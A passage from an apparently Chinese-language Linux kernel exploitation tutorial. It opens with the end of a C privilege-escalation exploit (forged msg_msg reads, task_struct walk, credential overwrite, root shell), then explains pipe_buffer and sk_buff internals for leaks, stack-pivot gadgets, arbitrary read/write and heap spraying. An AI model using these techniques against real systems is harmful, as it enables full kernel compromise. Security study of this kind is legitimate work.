    if (firewall_fd < 0) {
        puts("[-] failed to open firewall.");
        exit(-1);
    }

    add_rule(0, INBOUND);
    dup_rule(0, INBOUND);
    delete_rule(0, INBOUND);

    msq_id[0] = get_msg_queue();
    msq_id[1] = get_msg_queue();

    /* Distinct fill bytes and message types make the messages recognisable in the leak. */
    memset(small_msgbuf.mtext, 'a', sizeof(small_msgbuf.mtext));
    write_msg(msq_id[0], &small_msgbuf, sizeof(small_msgbuf.mtext), 1);
    memset(small_msgbuf.mtext, 'b', sizeof(small_msgbuf.mtext));
    write_msg(msq_id[1], &small_msgbuf, sizeof(small_msgbuf.mtext), 0x114514);
    memset(large_msgbuf.mtext, 'c', sizeof(large_msgbuf.mtext));
    write_msg(msq_id[1], &large_msgbuf, sizeof(large_msgbuf.mtext), 0x1919810);

    /* Fake header claiming DATALEN_MSG bytes of text, so the peek reads past the small message. */
    build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG, 0, 0);
    edit_rule(0, fake_msg, OUTBOUND, true);
    memset(oob_msgbuf.mtext, 0, DATALEN_MSG);
    /* NOTE(review): %p is applied to peek_msg()'s return value; its declared
     * type is not visible here — confirm the specifier matches. */
    printf("[*] peek_msg len: %p\n", peek_msg(msq_id[0], &oob_msgbuf, DATALEN_MSG, 0));
    printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
    qword_dump("leak kernel addr from shm_file_data", oob_msgbuf.mtext, DATALEN_MSG);

    /* Scan the leak in 0x40-byte steps for the 0x114514 message header;
     * its m_list.next is taken as the large message's address. */
    for (int i = sizeof(small_msgbuf.mtext); i + sizeof(struct msg_msg) < DATALEN_MSG; i += 0x40) {
        struct msg_msg *msg = (void *) &oob_msgbuf.mtext[i];
        if (is_dir_mapping_addr((size_t) msg->m_list.next)
            && is_dir_mapping_addr((size_t) msg->m_list.prev)
            && msg->m_type == 0x114514 && msg->m_ts == sizeof(small_msgbuf.mtext)) {
            large_msg_addr = (size_t) msg->m_list.next;
            break;
        }
    }

    if (large_msg_addr == -1) {
        puts("[-] failed to find large msg_msg addr.");
        exit(-1);
    }
    /* large_msg_addr is an integer address; cast so the argument matches %p. */
    printf("[+] large msg addr: %p\n", (void *) large_msg_addr);

    size_t kernel_offset = search_kernel_offset(oob_msgbuf.mtext, DATALEN_MSG);
    if (kernel_offset == INVALID_KERNEL_OFFSET) {
        puts("[-] failed to find kernel offset.");
        exit(-1);
    }

    init_cred += kernel_offset;
    init_task += kernel_offset;
    printf("[*] init_cred addr: %#lx\n", init_cred);
    printf("[*] init_task addr: %#lx\n", init_task);

    /* Segment pointer = &init_task->tasks - 8, so the data read after the
     * first DATALEN_MSG bytes begins at init_task->tasks. */
    build_msg(fake_msg, 0, 0, 1919810, DATALEN_MSG + DATALEN_SEG, init_task + TASKS_OFFSET - 8, 0);
    edit_rule(0, fake_msg, OUTBOUND, false);
    memset(oob_msgbuf.mtext, 0, DATALEN_MSG + DATALEN_SEG);
    printf("[*] peek_msg len: %p\n", peek_msg(msq_id[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
    printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
    qword_dump("leak root cred addr from init_task", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);

    /* mtext[DATALEN_MSG] corresponds to tasks.next, +8 to tasks.prev; pid is
     * located relative to the tasks field. */
    uint64_t prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
    uint32_t pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
    printf("[*] init_task->tasks.prev: %#lx\n", prev);
    printf("[*] init_task->pid: %d\n", pid);
    printf("[*] current pid: %d\n", getpid());

    /* Walk the task list backwards via tasks.prev until our own pid shows up. */
    cur_task = init_task;
    while (pid != getpid()) {
        build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG + DATALEN_SEG, prev - 8, 0);
        edit_rule(0, fake_msg, OUTBOUND, false);
        printf("[*] peek_msg len: %p\n", peek_msg(msq_id[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
        printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
        qword_dump("find task_struct", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);
        cur_task = prev - TASKS_OFFSET;
        printf("[*] task_struct addr: %p\n", (void *) cur_task);
        prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
        pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
        printf("[*] task_struct->tasks.prev: %#lx\n", prev);
        printf("[*] task_struct->pid: %d\n", pid);
    }
    printf("[+] find current task_struct addr: %p\n", (void *) cur_task);

    /* Receive the large message from msq_id[1] before starting the write stages. */
    read_msg(msq_id[1], &large_msgbuf, sizeof(large_msgbuf.mtext), 0x1919810);

    pthread_t tid[2];
    pthread_create(&tid[0], NULL, change_next, NULL);
    pthread_create(&tid[1], NULL, change_cred, NULL);

    pthread_join(tid[0], NULL);
    pthread_join(tid[1], NULL);

    system("/bin/sh");

    return 0;
}

pipe 管道相关

管道同样是内核中十分重要也十分常用的一个 IPC 工具,同样地管道的结构也能够在内核利用中为我们所用,其本质上由一个 virtual inode 与两个对应的文件描述符构成。

pipe_inode_info(kmalloc-192|GFP_KERNEL_ACCOUNT):管道本体

在内核中,管道本质上是创建了一个虚拟的 inode 来表示的,对应的就是一个 pipe_inode_info 结构体(inode->i_pipe),其中包含了一个管道的所有信息,当我们创建一个管道时,内核会创建一个 VFS inode 与一个 pipe_inode_info 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

数据泄露:

  • 内核线性映射区( direct mapping area)

    pipe_inode_info->bufs 为一个动态分配的结构体数组,因此我们可以利用他来泄露出内核的“堆”上地址。

pipe_buffer(kmalloc-1k|GFP_KERNEL_ACCOUNT):管道数据

当我们创建一个管道时,在内核中会分配一个 pipe_buffer 结构体数组,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

分配:pipe 系统调用族

创建管道使用的自然是 pipe 与 pipe2 这两个系统调用,其最终都会调用到 do_pipe2() 这个函数,不同的是后者我们可以指定一个 flag,而前者默认 flag 为 0

存在如下调用链:

1
2
3
4
5
do_pipe2()
__do_pipe_flags()
create_pipe_files()
get_pipe_inode()
alloc_pipe_info()

最终调用 kcalloc() 分配一个 pipe_buffer 数组,默认数量为 PIPE_DEF_BUFFERS (16)个,因此会直接从 kmalloc-1k 中拿 object:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

//...

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

释放:close 系统调用

当我们关闭一个管道的两端之后,对应的管道就会被释放掉,相应地,pipe_buffer 数组也会被释放掉

对于管道对应的文件,其 file_operations 被设为 pipefifo_fops ,其中 release 函数指针设为 pipe_release 函数,因此在关闭管道文件时有如下调用链:

1
2
pipe_release()
put_pipe_info()

put_pipe_info() 中会将管道对应的文件计数减一,管道两端都关闭之后最终会走到 free_pipe_info() 中,在该函数中释放掉管道本体与 buffer 数组。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
void free_pipe_info(struct pipe_inode_info *pipe)
{
int i;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
watch_queue_clear(pipe->watch_queue);
put_watch_queue(pipe->watch_queue);
}
#endif

(void) account_pipe_buffers(pipe->user, pipe->nr_accounted, 0);
free_uid(pipe->user);
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
if (pipe->tmp_page)
__free_page(pipe->tmp_page);
kfree(pipe->bufs);
kfree(pipe);
}

内存页的分配和释放

pipe_buffer 的 page 指针指向一个 page 结构体,而这个 page 结构体对应着一个内存页,这个内存页是 pipe_buffer 用来存取数据的 buffer 。

然而这个内存页不是在创建 pipe_buffer 的时候就分配的,而是在第一次向 pipe_buffer 中写入数据的时候分配。关键代码位于 pipe_write 函数,在检测到 page(即 pipe->tmp_page)为 NULL 时会向 buddy system 申请一张物理页。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#define alloc_page(gfp_mask) alloc_pages(gfp_mask, 0)

struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
...
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;

pipe_read 函数中如果 pipe_buffer 中的数据全部被读取出来则释放对应内存页。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
struct page *page = buf->page;

/*
* If nobody else uses this page, and we don't already have a
* temporary page, let's keep track of it as a one-deep
* allocation cache. (Otherwise just release our reference to it)
*/
if (page_count(page) == 1 && !pipe->tmp_page)
pipe->tmp_page = page;
else
put_page(page);
}

static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;

buf->ops = NULL;
ops->release(pipe, buf);
}

if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}

数据读取写入

pipe 负责读取和写入数据的函数分别为 pipe_read 和 pipe_write:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
...
for (;;) {
/* Read ->head with a barrier vs post_one_notification() */
unsigned int head = smp_load_acquire(&pipe->head);
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;
if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t chars = buf->len;
size_t written;
int error;
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;
if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
}
...
}

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
}
}
for (;;) {
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

pipe->head = head + 1;

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;
}
}
}

分析代码可知 pipe_inode_info 维护了一个 pipe_buffer 组成的双端队列,结构如下图所示:

具体到每个 pipe_buffer,其中的 offset 和 len 标记了该 pipe_buffer 对应内存页中数据的起始偏移与长度。

数据泄露

  • 内核 .text 段地址

    pipe_buffer->ops(类型为 struct pipe_buf_operations *)通常指向一张全局函数表,我们可以通过该函数表的地址泄露出内核 .text 段基址(通常为 anon_pipe_buf_ops)。

劫持内核执行流

当我们关闭了管道的两端时,会触发 pipe_buffer->ops->release 这一指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

存在如下调用链:

1
2
3
4
5
pipe_release()
put_pipe_info()
free_pipe_info()
pipe_buf_release()
pipe_buffer->pipe_buf_operations->release() // it should be anon_pipe_buf_release()

pipe_buf_release() 中会调用到该 pipe_buffer 的函数表中的 release 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
/**
* pipe_buf_release - put a reference to a pipe_buffer
* @pipe: the pipe that the buffer belongs to
* @buf: the buffer to put a reference to
*/
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;

buf->ops = NULL;
ops->release(pipe, buf);
}

因此我们只需要劫持其函数表到可控区域后再关闭管道的两端便能劫持内核执行流。当执行到该指针时 rsi 寄存器刚好指向对应的 pipe_buffer,因此我们可以将函数表劫持到 pipe_buffer 上,找到一条合适的 gadget 将栈迁移到该处,从而更顺利地完成 ROP。

常用 gadget 如下:

1
2
3
4
5
6
7
8
9
10
11
.text:FFFFFFFF81250C9D push    rsi
.text:FFFFFFFF81250C9E pop rsp
.text:FFFFFFFF81250C9F cmp rcx, rdx
.text:FFFFFFFF81250CA2 jb short loc_FFFFFFFF81250C85
.text:FFFFFFFF81250CA4 pop rbx
.text:FFFFFFFF81250CA5 xor eax, eax
.text:FFFFFFFF81250CA7 pop rbp
.text:FFFFFFFF81250CA8 pop r12
.text:FFFFFFFF81250CAA jmp __x86_return_thunk
...
.text:FFFFFFFF82003240 retn
1
2
3
4
5
6
7
8
9
10
11
.text:FFFFFFFF817AD641 push    rsi
.text:FFFFFFFF817AD642 pop rsp
.text:FFFFFFFF817AD643 xor eax, eax
.text:FFFFFFFF817AD645 test edx, edx
.text:FFFFFFFF817AD647 jnz short locret_FFFFFFFF817AD650
.text:FFFFFFFF817AD647
.text:FFFFFFFF817AD649 mov rax, [rsi+90h]
.text:FFFFFFFF817AD649
.text:FFFFFFFF817AD650
.text:FFFFFFFF817AD650 locret_FFFFFFFF817AD650: ; CODE XREF: .text:FFFFFFFF817AD647↑j
.text:FFFFFFFF817AD650 retn

调试时发现 edx = 0 因此也有下面这条 gadget 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
.text:FFFFFFFF8120B854 push    rsi
.text:FFFFFFFF8120B855 pop rsp
.text:FFFFFFFF8120B856 test edx, edx
.text:FFFFFFFF8120B858 jle loc_FFFFFFFF8120B8FB
...
.text:FFFFFFFF8120B8FB ud2
.text:FFFFFFFF8120B8FD mov eax, 0FFFFFFEAh
.text:FFFFFFFF8120B902 jmp short loc_FFFFFFFF8120B89F
...
.text:FFFFFFFF8120B89F pop rbx
.text:FFFFFFFF8120B8A0 pop rbp
.text:FFFFFFFF8120B8A1 pop r12
.text:FFFFFFFF8120B8A3 jmp __x86_return_thunk
...
.text:FFFFFFFF82003240 retn

可以通过 pwntools 查找。

1
2
3
4
5
6
from pwn import *

context(arch='amd64', os='linux')
elf = ELF('vmlinux')

# Search the executable segments of vmlinux for the assembled
# "push rsi; pop rsp" byte sequence and dump 0x40 bytes of disassembly at
# each hit so the tail of the gadget can be inspected by eye.
for x in elf.search(asm('push rsi; pop rsp;'), executable=True):
    # print() with one argument behaves the same on Python 2 and Python 3;
    # the bare `print` statement used before is a syntax error on Python 3.
    print(elf.disasm(address=x, n_bytes=0x40))
    print('')

任意大小对象分配

回顾 pipe_buffer 的分配过程,其实际上是单次分配 pipe_bufs 个 pipe_buffer 结构体:

1
2
3
4
5
6
struct pipe_inode_info *alloc_pipe_info(void)
{
//...

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

这里注意到 pipe_bufs 不是一个常量而是一个变量,fcntl 系统调用提供了 F_SETPIPE_SZ 命令让我们可以重新分配 pipe_buffer 数组并指定其数量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;

bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
...
}

unsigned int round_pipe_size(unsigned long size)
{
if (size > (1U << 31))
return 0;

/* Minimum pipe size, as required by POSIX */
if (size < PAGE_SIZE)
return PAGE_SIZE;

return roundup_pow_of_two(size);
}

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
size = round_pipe_size(arg);
nr_slots = size >> PAGE_SHIFT;
...
ret = pipe_resize_ring(pipe, nr_slots);
}

long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
struct pipe_inode_info *pipe;
long ret;

pipe = get_pipe_info(file, false);
if (!pipe)
return -EBADF;

__pipe_lock(pipe);

switch (cmd) {
case F_SETPIPE_SZ:
ret = pipe_set_size(pipe, arg);
break;
...
}
...
}

根据代码分析可知,pipe_fcntl 传入参数为 $n$ 时,最终在 pipe_resize_ring 函数中 kcalloc 申请的内存大小为(当 $n$ 小于 PAGE_SIZE 时按 PAGE_SIZE 计算):

$$\left\lfloor \frac{2^{\left\lceil \log_2 n \right\rceil}}{2^{12}} \right\rfloor \times \text{sizeof(struct pipe\_buffer)}$$

pipe_resize_ring 函数的具体实现如下:

首先申请指定大小的内存:

1
2
3
4
5
6
struct pipe_buffer *bufs;
...
bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
if (unlikely(!bufs))
return -ENOMEM;

检查新的大小是否小于当前 pipe_buffer 存放的内容,如果小于则更新 pipe_buffer 数量失败,释放申请的内存。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/**
* pipe_occupancy - Return number of slots used in the pipe
* @head: The pipe ring head pointer
* @tail: The pipe ring tail pointer
*/
static inline unsigned int pipe_occupancy(unsigned int head, unsigned int tail)
{
return head - tail;
}

mask = pipe->ring_size - 1;
head = pipe->head;
tail = pipe->tail;

n = pipe_occupancy(head, tail);
if (nr_slots < n) {
spin_unlock_irq(&pipe->rd_wait.lock);
kfree(bufs);
return -EBUSY;
}

将原有的 pipe_buffer 的内容复制到新的 pipe_buffer 中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
* The pipe array wraps around, so just start the new one at zero
* and adjust the indices.
*/
if (n > 0) {
unsigned int h = head & mask;
unsigned int t = tail & mask;
if (h > t) {
memcpy(bufs, pipe->bufs + t,
n * sizeof(struct pipe_buffer));
} else {
unsigned int tsize = pipe->ring_size - t;
if (h > 0)
memcpy(bufs + tsize, pipe->bufs,
h * sizeof(struct pipe_buffer));
memcpy(bufs, pipe->bufs + t,
tsize * sizeof(struct pipe_buffer));
}
}

更新 pipe_buffer

1
2
3
4
5
6
7
8
9
10
head = n;
tail = 0;

kfree(pipe->bufs);
pipe->bufs = bufs;
pipe->ring_size = nr_slots;
if (pipe->max_usage > nr_slots)
pipe->max_usage = nr_slots;
pipe->tail = tail;
pipe->head = head;

任意地址读写

根据 pipe_buffer 读写数据的原理我们不难想到可以通过修改 pipe_buffer 中的 page 指针指向指定的 page 结构体,并且修改 offset 和 len,就可以读写该 page 结构体对应的内存页中的数据。

由于 vmemmap_base 指向的 page 数组与线性映射区的内存页是线性映射的关系,因此在已知一个线性映射区地址的情况下,就可以计算出对应的 page 结构体地址,进而读写该地址对应的数据。

至于非线性映射区的地址,我们可以先扫描线性映射区查找到进程的 task_struct 进而获取 pgd ,然后通过解析页表获取到该地址对应的物理地址,由于物理地址与线性映射区地址也是线性映射的关系,因此我们可以得到线性映射区中的地址,从而读写该地址对应的内存。

sk_buff:内核中的“大对象菜单堆”

sk_buff:size >= 512 的对象分配

sk_buff 是 Linux kernel 网络协议栈中一个重要的基础结构体,其用以表示在网络协议栈中传输的一个「包」,但其结构体本身不包含一个包的数据部分,而是包含该包的各种属性,数据包的本体数据则使用一个单独的 object 储存

这个结构体成员比较多,我们主要关注核心部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct sk_buff {
union {
struct {
/* These two members must be first. */
struct sk_buff *next;
struct sk_buff *prev;

// ...
};

// ...

/* These elements must be at the end, see alloc_skb() for details. */
sk_buff_data_t tail;
sk_buff_data_t end;
unsigned char *head,
*data;
unsigned int truesize;
refcount_t users;

#ifdef CONFIG_SKB_EXTENSIONS
/* only useable after checking ->active_extensions != 0 */
struct skb_ext *extensions;
#endif
};

sk_buff 结构体与其所表示的数据包形成如下结构,其中:

  • head :一个数据包实际的起始处(也就是为该数据包分配的 object 的首地址)
  • end :一个数据包实际的末尾(为该数据包分配的 object 的末尾地址)
  • data :当前所在 layer 的数据包对应的起始地址
  • tail :当前所在 layer 的数据包对应的末尾地址

data 和 tail 可以这么理解:数据包每经过网络层次模型中的一层都会被添加/删除一个 header (有时还有一个 tail),data 与 tail 便是用以对此进行标识的。多个 sk_buff 之间形成双向链表结构,类似于 msg_queue,这里同样有一个 sk_buff_head 结构作为哨兵节点。

分配(数据包:__GFP_NOMEMALLOC | __GFP_NOWARN)

在内核网络协议栈中很多地方都会用到该结构体,例如读写 socket 一类的操作都会造成包的创建,其最终都会调用到 alloc_skb() 来分配该结构体,而这个函数又是 __alloc_skb() 的 wrapper,不过需要注意的是其会从独立的 skbuff_fclone_cache / skbuff_head_cache 取 object。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
int flags, int node)
{
struct kmem_cache *cache;
struct sk_buff *skb;
u8 *data;
bool pfmemalloc;

cache = (flags & SKB_ALLOC_FCLONE)
? skbuff_fclone_cache : skbuff_head_cache;

if (sk_memalloc_socks() && (flags & SKB_ALLOC_RX))
gfp_mask |= __GFP_MEMALLOC;

/* Get the HEAD */
if ((flags & (SKB_ALLOC_FCLONE | SKB_ALLOC_NAPI)) == SKB_ALLOC_NAPI &&
likely(node == NUMA_NO_NODE || node == numa_mem_id()))
skb = napi_skb_cache_get();
else
skb = kmem_cache_alloc_node(cache, gfp_mask & ~GFP_DMA, node);
if (unlikely(!skb))
return NULL;
prefetchw(skb);

/* We do our best to align skb_shared_info on a separate cache
* line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
* aligned memory blocks, unless SLUB/SLAB debug is enabled.
* Both skb->head and skb_shared_info are cache line aligned.
*/
size = SKB_DATA_ALIGN(size);
size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
//...

sk_buff 虽然是从独立的 kmem_cache 中分配的,但其对应的数据包不是,我们在这里注意到分配数据包时使用的是 kmalloc_reserve(),最终会调用到 __kmalloc_node_track_caller()走常规的 kmalloc 分配路径,因此我们仍然可以实现近乎任意大小 object 的分配与释放。

因此 sk_buff 与 msg_msg 一样常被用来完成堆喷的工作,不同的是 msg_msg 带了一个 header,而 sk_buff 的数据包则带一个 tail——skb_shared_info 结构体。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct skb_shared_info {
__u8 flags;
__u8 meta_len;
__u8 nr_frags;
__u8 tx_flags;
unsigned short gso_size;
/* Warning: this field is not always filled in (UFO)! */
unsigned short gso_segs;
struct sk_buff *frag_list;
struct skb_shared_hwtstamps hwtstamps;
unsigned int gso_type;
u32 tskey;

/*
* Warning : all fields before dataref are cleared in __alloc_skb()
*/
atomic_t dataref;

/* Intermediate layers must ensure that destructor_arg
* remains valid until skb destructor */
void * destructor_arg;

/* must be last field, see pskb_expand_head() */
skb_frag_t frags[MAX_SKB_FRAGS];
};

skb_shared_info 结构体的大小为 320 字节,这意味着我们能够利用分配的 object 最小的大小也得是 512 字节,这无疑为我们的利用增添了几分难度,但不可否认的是 sk_buff 仍为我们提供了较大对象的任意分配写入与释放。

提示

为数据包分配的内存是从 kmalloc-xx 而不是从 kmalloc-cg- 中申请的。

释放

我们只需要沿着发送的路径接收该包就能将其释放掉,例如若是我们通过向套接字中写入数据创建了一个包,则从套接字中读出该包便能将其释放

在内核中调用的是 kfree_skb() 函数进行释放,对于数据,其最终会调用到 skb_release_data() ,在这其中调用到 skb_free_head() 进行释放:

1
2
3
4
5
6
7
8
9
10
11
12
static void skb_free_head(struct sk_buff *skb)
{
unsigned char *head = skb->head;

if (skb->head_frag) {
if (skb_pp_recycle(skb, head))
return;
skb_free_frag(head);
} else {
kfree(head);
}
}

sk_buff 本身则通过 kfree_skbmem() 进行释放,主要就是直接放入对应的 kmem_cache 中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
* Free an skbuff by memory without cleaning the state.
*/
static void kfree_skbmem(struct sk_buff *skb)
{
struct sk_buff_fclones *fclones;

switch (skb->fclone) {
case SKB_FCLONE_UNAVAILABLE:
kmem_cache_free(skbuff_head_cache, skb);
return;

case SKB_FCLONE_ORIG:
fclones = container_of(skb, struct sk_buff_fclones, skb1);

/* We usually free the clone (TX completion) before original skb
* This test would have no chance to be true for the clone,
* while here, branch prediction will be good.
*/
if (refcount_read(&fclones->fclone_ref) == 1)
goto fastpath;
break;

default: /* SKB_FCLONE_CLONE */
